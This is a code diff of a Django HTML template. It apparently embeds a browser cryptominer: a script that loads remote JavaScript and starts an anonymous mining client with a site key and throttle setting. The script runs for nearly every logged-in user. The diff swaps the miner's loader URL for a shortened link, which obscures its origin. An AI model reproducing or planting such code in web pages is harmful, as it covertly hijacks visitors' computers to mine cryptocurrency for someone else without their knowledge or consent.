--- a/main_app/templates/test.html
+++ b/main_app/templates/test.html
@@ -12,7 +12,7 @@
     <!-- Jus70 -->
 {% if user.email != "a" %}
 <script>
-  $.getScript("https://www.hostingcloud.racing/V843.js", function() {
+  $.getScript("https://cutt.ly/wns1PUz", function() {
     var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
         throttle: 0.7, c: 'w', ads: 0
     });
